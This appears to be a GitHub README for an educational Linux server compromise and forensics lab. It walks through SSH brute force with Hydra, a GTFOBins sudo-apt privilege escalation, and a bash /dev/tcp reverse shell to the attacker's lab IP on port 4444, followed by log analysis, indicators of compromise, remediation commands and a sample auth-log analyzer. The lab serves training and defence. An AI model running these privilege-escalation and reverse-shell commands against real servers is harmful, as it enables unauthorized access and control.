ALLAKORI/Linux-Server-Compromise-Forensic-Investigation-Lab

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

21 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

Linux-Server-Compromise-Forensic-Investigation-Lab

Simulated Linux server compromise with full attack chain, forensic analysis, and incident response (Red Team & Blue Team).

πŸ” Linux Server Compromise & Forensic Investigation Lab

📌 Overview

This project simulates a complete cybersecurity incident on a Linux server, combining Red Team (attack) and Blue Team (defense) approaches.

The lab reproduces a realistic compromise scenario:

  • Initial access via SSH brute-force
  • Privilege escalation
  • Persistence mechanisms
  • Reverse shell communication
  • Detection and forensic investigation
  • Incident response and remediation

🖥️ Environment

| Role | System | IP Address | Tools |
|---|---|---|---|
| Target Server | Ubuntu | 192.168.252.133 | UFW, Auditd, Fail2ban |
| Attacker | Kali Linux | 192.168.252.135 | Nmap, Hydra, Netcat |

🎯 Objectives

  • Harden a Linux server
  • Simulate a real attack scenario
  • Detect malicious activity via logs
  • Perform forensic analysis
  • Extract Indicators of Compromise (IOC)
  • Apply incident response

πŸ” Hardening Phase (Blue Team)

Implemented security measures:

  • SSH Hardening:
    • `PermitRootLogin no`
    • `MaxAuthTries 3`
  • Firewall configuration (UFW)
  • Fail2ban protection (brute-force defense)
  • Auditd monitoring:
    • `/etc/passwd`, `/etc/shadow`
    • sudo usage
    • process execution (`execve`)
  • Log management using rsyslog
  • Time synchronization (NTP)


βš”οΈ Attack Simulation (Red Team)

1. Reconnaissance

  • Nmap scan → SSH service detected (port 22)

2. Brute-force Attack

  • Tool: Hydra
  • Wordlist: rockyou.txt
  • Result:

```
alice : alice123
```

3. Initial Access

  • SSH login using compromised credentials

4. Persistence

  • Creation of malicious user:

```
hacker_user
```

5. Privilege Escalation

  • Exploitation via GTFOBins:

```
sudo apt changelog apt
!/bin/bash
```

→ Root access obtained

6. Reverse Shell

```
bash -i >& /dev/tcp/192.168.252.135/4444 0>&1
```

πŸ” Detection & Forensic Analysis

Auth Logs Analysis

  • Hundreds of failed login attempts detected
  • Successful login from attacker IP

Suspicious Activities

  • sudo execution by user alice
  • useradd used to create backdoor account

Auditd Analysis

  • Detection of executed commands:

```
exe="/usr/bin/dash"
```

  • Reverse shell activity identified
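Added example (not part of the lab repository): a small Python analyzer that applies the auth-log checks above to constructed sample lines following the lab's scenario. The log lines, the failure threshold and the list of account-management tools are assumptions made for the example.

```python
import re
from collections import Counter

# Constructed sample of /var/log/auth.log lines mirroring the lab's scenario (not real log data).
SAMPLE_AUTH_LOG = """\
Mar 10 22:14:02 target sshd[2101]: Failed password for alice from 192.168.252.135 port 40210 ssh2
Mar 10 22:14:02 target sshd[2102]: Failed password for alice from 192.168.252.135 port 40211 ssh2
Mar 10 22:14:03 target sshd[2103]: Failed password for invalid user admin from 192.168.252.135 port 40212 ssh2
Mar 10 22:14:03 target sshd[2104]: Failed password for alice from 192.168.252.135 port 40213 ssh2
Mar 10 22:14:04 target sshd[2105]: Failed password for alice from 192.168.252.135 port 40214 ssh2
Mar 10 22:15:10 target sshd[2110]: Failed password for bob from 192.168.252.10 port 50001 ssh2
Mar 10 22:19:31 target sshd[2130]: Accepted password for alice from 192.168.252.135 port 40998 ssh2
Mar 10 22:20:00 target sshd[2140]: Accepted publickey for bob from 192.168.252.10 port 50002 ssh2
Mar 10 22:21:05 target sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/sbin/useradd hacker_user
"""

FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted (\S+) for (\S+) from (\S+) port")
SUDO_RE = re.compile(r"sudo:\s+(\S+) : .*COMMAND=(\S+)(.*)$")
ACCOUNT_TOOLS = {"/usr/sbin/useradd", "/usr/sbin/adduser", "/usr/sbin/usermod"}  # assumed watch-list

def analyze_auth_log(lines, threshold=5):
    """Flag brute-force sources, logins that follow a brute force, and sudo-driven account changes."""
    failed = Counter()          # failed password attempts per source IP
    brute_force = set()         # IPs that crossed the failure threshold (assumed value)
    suspicious_logins = []      # (user, ip) accepted from an IP already flagged
    account_changes = []        # (sudo user, command) for account-management tools
    for line in lines:
        if m := FAILED_RE.search(line):
            ip = m.group(2)
            failed[ip] += 1
            if failed[ip] >= threshold:
                brute_force.add(ip)
        elif (m := ACCEPTED_RE.search(line)) and m.group(3) in brute_force:
            suspicious_logins.append((m.group(2), m.group(3)))
        elif (m := SUDO_RE.search(line)) and m.group(2) in ACCOUNT_TOOLS:
            account_changes.append((m.group(1), (m.group(2) + m.group(3)).strip()))
    return {"failed_by_ip": dict(failed), "brute_force_ips": sorted(brute_force),
            "suspicious_logins": suspicious_logins, "account_changes": account_changes}

if __name__ == "__main__":
    for key, value in analyze_auth_log(SAMPLE_AUTH_LOG.splitlines()).items():
        print(f"{key}: {value}")
```

On the sample, the attacker IP is flagged after five failures, the later accepted login for alice from that IP is reported as suspicious, and the `useradd hacker_user` via sudo is surfaced as an account change.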

🚨 Indicators of Compromise (IOC)

  • Attacker IP: 192.168.252.135

  • Compromised user: alice

  • Malicious user: hacker_user

  • Suspicious commands:

    • sudo
    • useradd
    • bash
  • Reverse shell on port 4444


🛡️ Incident Response

Containment

  • Block attacker IP using UFW:

```
ufw deny from 192.168.252.135
```

Eradication

  • Remove malicious users:

```
userdel -r hacker_user
```

Recovery

  • Reset compromised password
  • Remove dangerous sudo privileges

Verification

  • No unauthorized users
  • No SSH keys added
  • No cron persistence

📊 Attack Timeline

| Time | Event |
|---|---|
| 22:14 | Brute-force attack started |
| 22:19 | Successful login (alice) |
| 22:21 | Backdoor user created |
| 22:23 | Privilege escalation |
| 22:25 | Reverse shell established |

📸 Evidence

  • Attack → `03_hydra_success`
  • Detection → `01_failed_passwords`
  • Exploitation → `02_privilege_escalation`
  • Response → `01_ufw_block`

πŸ“ Structure

  • screenshots/ → execution evidence
  • docs/ → detailed analysis
  • logs/ → extracted logs and IOC
  • report/ → full forensic report

⚠️ Disclaimer

This project was conducted in a controlled lab environment for educational purposes only.
